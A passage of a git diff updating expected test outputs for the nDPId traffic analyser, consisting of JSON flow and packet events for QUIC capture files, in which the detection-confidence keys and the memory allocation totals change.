6XwWXKQ9UBS95a7rhiJrqp9UhK13hVq2njbzA2RTKn+s6aobHuCe7WYl8MS0v+T1I2mq6xhFweTuG3hdPnqOkRm4ZoVgOJD0lCKOsJoqR\/flxx3xDBRfRXA8iUDaNTTEDU\/z02HAUlthQ7j4NctXjWeuXBBlOg7myIMc\/qdP9kFsh+WR6c3MixjpAvWeqwTgRfaK9+1rOtle4mwbhL9JoI7ra+3Gv2NscrKYby4y26dOybmnMTxwtUycCSAskoGy0VBL8N4JHmZ24PfumlXDiIGg2TKa89dG5C\/HkH2BkzPa1N4KDB4DWk6vrxpVEaDtN+T4HBAwv5vr27n4ZsI+e+KkpDTUVeRt50at0s6GoBT3dU0bS5u7btTCPh9Q1wT2QzGXBx7LpZUB7WKGCAuzDm\/R\/0DsgE98U+jp\/GQA0cAouUv\/ia5B4dArOX2Hrh68\/LWZUcgSOk4Mb6isI1HW4FG8qqFdvzMsYyg1nY6\/mwkjTgfzcUcT8HuT8b3VEAFl1iojo++o6URU0CqxVGRv\/\/1U12juUa9BOlngQwkpzTFGYZpnjBvHYYqGgaZguBUx+OsJazqFqHN19AyL0Cexa75QT9qZtk9tlxGc5gUfqCX+xv3PoF1DxwRReTjQ6GUHNrQvfC+a6lJLkY2Bl3ty6kTSniC0uwNMTlaRzlXCmLXOF\/spgpAb4J+XbuA0NFIBJPbBj0R9yb2qZMfcDSVc01ubKMDR7P8+q\/ujxavqxlOlRZ7sWwAht5G68KiSsHb\/3\/\/02Hn9LDN5RMC7i0XnG5j+4mV0HA\/xhs5p4cwjOIcpOhsDt89zfffoiq59dKLm9k8JMdheqZnJmgMgBN6WVdrtRW3QVuAWi5RMKLwkPwNbBlRiZ7vzcC0isWQeIhVQokyi3N3zirO2CgYfmItTVGQ2zRdOvhKQCqtBpADZshhP71+ve\/mG\/ZuBnSTjROHtGsF0IToyFyclFG850LYNt2AK7xXn6KoFoVxoXz2L1VgOHjSwdoUQ19OP2FjGJxXDbRibAbzK8ZTPhWbes9V2wQus09AwDRo1tAPoOt8iAFo0luKi1hunaWIbYQU7ulHqooKgCNKaw7Wpw5p7aBaAi2l
+FM0QE0XvSek9UgM9xUI8mGJp9C08XT9sbpCwgHL3HCxNUV5PMTiLkvNmY4VY0RA6MyaCk5fo74e5RCmQDSSqS96ehyCpgP+n+wZ6UBRKek9YDjVH4RHvmZCvYco7SKBDJbbMddFHN3+HFbSO2rxv8iuy6DZaiePYnuW\/mxUn+OUffPWu97Jt4A0bz8W3eamvrlSSbu6c70YR1qFE42450VRE4NhhFL8v\/i0jKrz069uRv1GcqnqW1Vv22X49oie0v9YMThrSkmy8c0tELsKMRwtXMA=="} -00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1600365863681,"flow_last_seen":1600365863839,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":24449,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1600365863839,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} +00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1600365863681,"flow_last_seen":1600365863839,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":24449,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1600365863839,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":24449,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1600365863839} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880427 bytes -~~ total memory freed........: 5880427 bytes -~~ total allocations/frees...: 118165/118165 +~~ total memory allocated....: 6014061 bytes +~~ total memory freed........: 6014061 bytes +~~ total allocations/frees...: 120927/120927 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 2153 chars diff --git a/test/results/quic-v2-01.pcapng.out b/test/results/quic-v2-01.pcapng.out index 45cb1e61f..d49cd00bf 100644 --- a/test/results/quic-v2-01.pcapng.out +++ b/test/results/quic-v2-01.pcapng.out 
@@ -2,10 +2,10 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643108746209} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643108746209,"flow_last_seen":1643108746209,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1643108746209,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643108746209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1643108746209,"pkt":"CAAnfrFjCgAnAAAACABFAgUAYl5AAEAR4XTAqDgBwKg4xoW1EVsE7AiU1XCaUMQIcS7WREhCV\/wIS6wx1HkzRzIARMpgEngor+SP9cKuZZ790399gfWZ0vz0FxYf3xs2l5F+jOUhVUm0eAuyWRJBLQArRRvX1qo16xZ7zI8FmeYud7mt05kYcpsLS0CK5YUUgnCsMjxal9+nmWnSgnUmuD4YMiDaT6\/KWxcW3IdsDGvbq4FeykelUyMNsUCZYyDrZ6tsJBdjOLQQFa+vzk75NiOy5EmEJ6SPOLrba70kLVHmTVrPs01TngptArQ7FyxB2fdFSCA98+vX1vy+0dxofLlBkhde4Ecbnz9YOSqzBYGBTufEgJaDB4JmPJGKd1oAGP7HmhM5nY3WzYdZ5vvX8uiInd7bKxEse8tCV2SEo4DkcuQF861+wGMhMPWJ0aZB+JogqwR55Ko7mR6S6YESBAum9bWYFXEgpEt3H4x2FczwRrrcfA9q4zQBLi8fNbFCBDZugGFHVWEWeExGDJ5N9Vm5k+5RxA76cZBEl7Ri9SCuAvo\/SVHd23+Pk6NwInTw+pU1Xi8DrCOSBpDUPy9oc9sZ0k+WLrevXGals6+J\/S3cgvga0IDGpm4KD3fPl8Mx6m2dMLi6VSzIGZitxZfQbx3pwxbh36emZdZVyxAVPQ6KsKixf3p+65+SqFGSH5IsN0vmfHJCQ5QiTTFwj56WFnghOsO3etGKlaSytkaT4qe8ZRheiBZmOeYegDYef4+iV2ZwAJRhlZArgrSyARWB4JR9MQKmc2r6sdMQGQIXKHFtJtIM5FjupxjaypWAyo21FHg0Pr82Ajw494E3kZ9bG9LGZwvm63PaW\/uzgr9hBYDLBuOu03NTnICf+thHnuXyQPXQzzH+VGtF+WeahwU6RqIydmLAGdtWh3oSwaLxdHDfQwmjlW\/kGW3cZ7xq9lxGSvY5PtPXlIWQOD3GcHgAowz48DO3fyd57+xXqrOEqRzXgYSI3ZAmKCXukVrornbFLllIzBhH\/fmW4yoI8emKYYJEMPEB5t\/20YhBtskEtZn50ef3Us2nRO2IkEmxYNIujXPh5cEVi9z+SvL+onhjjikDdkg1OMOb88MXNKAesAdJ81Dsgw53s2aapp3YuCDR8S4XCpmT4SsXeUwHmkorOfoDi8HNdKXSHWdiNQFwhNWuRv2iwE0Re4wNzacPeolWV9z7vo1ftVC0KYCnypCGOk94YggW\/E6WhIwKFaCFDmbu5TtyVWbWhyxsyHOb8WF5IuDY+zaYH4gDcAnVNC52Db3S2zQuttNi9ommHQHIbwv08Dt6PNfw0EneP0D79tGO9Zuk9B3hxnt28Wwxy433MighVva9zw6tDCeZ1RDo18oMw7RULMTnD8fpyaAjL3Ey6ypEj71EoQQ9p3mk2Jcl4pyIGR5xObSAJplg0ySrcwng5AfFRHm6b4LeGixjGI5tyQotRY7JG0P9hGhbSGTVX0DDQO6ExXPZ8eJqibwqDJ\/HVwgD5t+iO0K0wK+hq8jpO6tPZIekBQAiyVsogudvq3UQlZrCfspM6V3NHLXwDaayGcQEX3J6ErEoEWjSNjgAtQ
6o5rv2Wfe+ojGm0YSN+4lCRrNbW6P1KA4pFxW9G57DqCJXNQ\/Cs5Y2v5OhZJlL\/Q1v7E\/lFUki2gYOpi4+wx+16u0e+UbybJFsLwJD0tU\/1QYr6ZfcZ4ae3fIAMg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643108746209,"flow_last_seen":1643108746209,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1643108746209,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643108746209,"flow_last_seen":1643108746209,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1643108746209,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643108746211,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1643108746211,"pkt":"CgAnAAAACAAnfrFjCABFAgUAAoAAAEARgVPAqDjGwKg4ARFbhbUE7O7hnXCaUMQIS6wx1HkzRzII64iRQkuUIpwAQJyCVjJNuDCrTNqXXWMPn6Re4L7SYVwqGIQCQc\/4z9NyAaPCA1EjtACuJoZLCrSNpYRSybpCuKQ+WoUiUllNx92L2MPAGJw7utYFPv5OGHw1\/\/sWndgkLy8hp7pR69\/u09rZKcS+JfFwJmuIf\/ksSjGDUumn50Ay2Rd6o4XXl0HmsmbBIvWvgU6hASVdT4jxaoclAPsXX8CPP0up6Fe0cJpQxAhLrDHUeTNHMgjriJFCS5QinEQVHufFpgZs2aV6du2ZRQqQKDOjoGilHODVeRgnXJ5P7T\/zsZp32p1pLUsBPppTZZgXUGe0MYPRpYRLZP6S2YwCHKWU+l73n0JGtHauiFtNycThrlHgcsb8sk5tcvU6Y6ScYjaBJZo4SvzfNpo4yZWfBNk2UYHfihFbXoBagL8Ni3TJrQD045tOl+1YfuvN63veyZsQEZqEx0dBAmyVl+9xjvqkhzopKh+NpWRz5BIklAlUFmpNduMfQ3T20hAf9mJ3AOigASJmi6bsOzfT+fmMLLJFCGGvf7Vtj5E1FZRVn4fPJh6AHDI4r32EO9lBeOo\/bRxKO\/xtuNE4dXyQrhgsAmgYHZAjkPqRu\/l7804XDa5V8jNWzrthKJ47r2cSNRYsG+fH2fUAebN4YB+rihSsIZxpHY2QnwFGSwB6H7Skxg+Iph02BLynk+Iu8t78JbQQo03RTVad7a1H2K5yGJBnwMaDh8uWKRogMWzILW0GAvr6cB6rKtZvIB6iaFRtpW21wxF6FMiWghHWS2MMSMwh35jVZuDUmDisttokt9hNGZX0VcNuKmWidzlE8BvnwG5U\/lPWrVnAvZVmrZTmpKOyI5TR7nxh84GrxxCAx17MsDCnck39parnwVt\/QNJg4GreMjaXUUPTYWQryOwbG6s95MTEr3kfYLs4mW1uf0zDrci29F2sFu\/C\/HmqkFvZ0OOGC+62wGqGORW\/vlf01u6eGRup6wAte8fwWPF\/vwQLZV4\/zxpFUgF0t
AqfKM3PO4Haxa9nHsPVZrUGZMlLFWcB4nBKG1NdoHQpFnsMhBc+wza2JrPisqt5PiVyJC6OvV\/cU7ww3Rc1ZbzC4jloEENrow5U5qEqSaBP1zNwYznCuMne7LwjmE8EnIma1wUrAiD9QtQZyRcWI2tpjtba1QsGHPmDL5TsbCiu5lRo6fKqxLAw32vAkyC76P1133lt7HXruzSBRhmkFpsQbeMtEt1sNBll1ZQMowIuN84gLLCcft+MTcp3i74\/r8i865o44mVqYEl+o8X\/pbSdpT9L6gLAevV9TpMYpr+mcHT0ieagX7Jnn35uw6zjOtQWRDf+XCisrr1nKY1EVNzop8RK6vKaPR4oivRBODylVd6kbG0JUHAnr0Ix4f91IhN0iE9wN0staG0WUiyWtw\/orMSuxqBfKKdgnMAvmqdZTtqpjXi4aDVPEGseUXFoRd2eIp1NKtyrFMTN8zew2FQfUM5ZPV+mLZOckS47BcCaj33vmjmNhp4PqOibtw4GGIkqKdtzvIDU5hpFJQe3oYXwcGYY3eEEzdtrD2Vx0tDP6Yxy6KvVsm5\/mMYXMhGZoUA1zlKEtVTTbazFot35oVX4ngIUMjLuaLnu+ZQA\/SsjZCeWQrKvnx2aQ0fMdg=="} 01417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643108746211,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":766,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":766,"pkt_l4_len":732,"thread_ts_msec":1643108746211,"pkt":"CgAnAAAACAAnfrFjCABFAgLwAoEAAEARg2LAqDjGwKg4ARFbhbUC3F+UvXCaUMQIS6wx1HkzRzII64iRQkuUIpxBBHClZrSkXwcilginpQcYrC6+gYqStd9rEPJAVa\/X+ectxL4RSmYFqLCVrwpVh1cagxhOComdCEfuthVLRVGijz0VZq73gJfVJDTIt9AqzDxtaVsVpsxn9nkBr8pmVajuM19igvEhLOOlSEyBeUeB0DFdaZHW2\/JO3NISTHIWsZrZsFMVLd9gHsuxJ1cw3ZhmXfOm4UQbO0gsJiSVP1hEVffenYC7rMaAhCUYN9+RJxV5yNtMPMGyD3sgFiZTkHnxcTLuuCOpBBBkbts\/gMCM9IZChkDacnOh2OF9\/ohY3MEFlrim9kn0Lkww\/L7utDiRt6G4nl7rnCzjkcY3xLHSfS\/UQGApX0usMdR5M0cyG4HtNIk9Hu3yusEW1qJhexs\/jd2MFqPbzXoJkoBqBRJp9qv7uPIeaJrkQv0lZW4FoaNVZAxaKV+W4vwOyfLLLUAqbD+eP0q2akwmVXy9Y8QV3RpHIAEJdYstRBWUkoiGbfH\/tn+FdXpRyxXFod1a\/iZeqISyuYA2sKP1DJjEFrTzbkdHxX2JNiQQ2tZ+ApMfsQ0Q3QHD6f2C+xRLtvPcLqXP7RxXsRrD38p085fQ2lzG5FGYGgbhRGLwEvS2xYmIc5SWcIMn4zDkXXhhptIlqESYssWwykAjHZI2+hUtqOdrCizJkWiDODkpCMdaXGRR20dzaKQXdlriwcHLV5d1GvkCwMjcqS+C3ysNw8ltkxZbJAw3X1KjTK669DDz0zSittHV41nQk4SLHBtK3xCfytcsQ2Woqekdb3A1Hgo2e8QMTF4S4OsVjiekXWM847U9xQtRGGBIxOeuuzZN2uX3hL9UxceXknbMIBuTtD1iz9sd5bcqUQJpjX4\/iuJ0S
wzD3dHw3Uy0h7w+q864l4fPWvhkeXfYvfcT+Icqi6TMXyciH2pSvVxaT4WJf32OcA=="} -00936{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":923,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":923,"flow_first_seen":1643108746209,"flow_last_seen":1643108746226,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1273220,"flow_avg_l4_payload_len":1379,"midstream":0,"thread_ts_msec":1643108746226,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00936{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":923,"source":"quic-v2-01.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":923,"flow_first_seen":1643108746209,"flow_last_seen":1643108746226,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1273220,"flow_avg_l4_payload_len":1379,"midstream":0,"thread_ts_msec":1643108746226,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.198","src_port":34229,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":923,"source":"quic-v2-01.pcapng","alias":"nDPId-test","packets-captured":923,"packets-processed":923,"total-skipped-flows":0,"total-l4-payload-len":1273220,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1643108746226} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 923/923 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5906486 bytes -~~ total memory freed........: 5906486 bytes -~~ total allocations/frees...: 119058/119058 +~~ total memory allocated....: 6040120 bytes +~~ total memory freed........: 6040120 bytes +~~ total allocations/frees...: 121820/121820 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 2141 chars diff --git a/test/results/quic.pcap.out b/test/results/quic.pcap.out index ab0f1390e..99e066e5a 100644 --- a/test/results/quic.pcap.out +++ b/test/results/quic.pcap.out 
@@ -2,40 +2,40 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1431155536815} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431155536815,"flow_last_seen":1431155536815,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1431155536815,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02241{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431155536815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1431155536815,"pkt":"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\/5U0D3\/sl7Junn5Fxx\/1VNs1C1kCtxr0CV9UPILNoJ6w2heNOu0THXmZnbqXjfZAAAAEFFU0diZXRhIENocm9tZS80My4wLjIzNTcuNDWSgFuKS9buSt4mHNzF5UW8AAAAAFg1MDkAAAQAHgAAALUiugwS5Xe6lV7+35SrDjhQNi2XDPMM\/SAa6745q60xAQAAAEMyNTWyymQS2aTzwxJH\/U1CkeUIQAt7kKmueetRQklDOGABACXmg4KWna0TB6ed5h20iLVA1zTe0FGDOptzFKaIlVwv9K6LN7uMdA4zwVZIB1iByXkmIDPeaAjR8KDHiEXiLMdlilnNIxXrsf36+nSmAywD99MMia5QSojDYPQnkx\/kpc2+WkgLuTD7x6JugKntVJ0OcgBRa3ZbeaVzbIzXT9DutsK0zdmFTlT7PzF\/1Y0KupYf9uk4kqnlGvQLoUuyyKbFovu6AACgAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431155536815,"flow_last_seen":1431155536815,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1431155536815,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"},"quic": 
{"client_requested_server_name":"mail.google.com","user_agent":"beta Chrome\/43.0.2357.45"}} +00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431155536815,"flow_last_seen":1431155536815,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1431155536815,"l3_proto":"ip4","src_ip":"192.168.1.109","dst_ip":"216.58.212.101","src_port":57833,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GMail","breed":"Acceptable","category":"Email"},"quic": {"client_requested_server_name":"mail.google.com","user_agent":"beta Chrome\/43.0.2357.45"}} 01029{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431155536861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":478,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":478,"pkt_l4_len":444,"thread_ts_msec":1431155536861,"pkt":"ZHACjT05eJKcD6iOCABFAAHQHY9AAEARrNjAqAFt2DrUZeHpAbsBvNDyDbLeXfFPVUXrUTAyNAKdxuQD3gljSLhQUOfLRbUHNhGyhVA9b2u4w1RW9E4SCZCpycMJZccQCIwgTfygJ\/6u\/OxyXHQ8t9GsIUVpGN5BSEz\/EaopIjzG0oey+J14dhVaQT5clZ4hX2alMKUnKCpX2UHp8k4gIBE+BTaDbhx4sVltZ3YRbFd1slVBcwxCCDis9hGoXWyhcUU9TpSCvPXqyDIBYGsw8hGUNxjvWcC36dLiKPlQ1A++VHlkjzGxGsfgIrij15t0O6lgXxVbA\/HpW3G2ebAmsKraKCAnkkUtJl3AOI\/J2OljPOJ8ybsb8ihq0NT5yt7I6jw60az5CR6QV4lZS\/t+fQsKeKH0MrEQhH3b6f+BZUKI9uikSR4hfQxA8xYeMMFcn\/fjScjPTaUqPoQqgHKJPMZAaJaOIXR\/06t5\/mWN79wAQ5uIfj\/sSvnF2vA+Wg+Ct+7u2iMK\/1hOAY0\/EO0phnuWYuhnxN7rmjjYiKKpzjb+WYnzCHocgbS6q4u8VmchP8qd2Emms7CkStzYV\/CAUZKEnfSvajU\/RaVfjhz9giNrW3Dr5B1Mu7zIwMFBEg=="} 
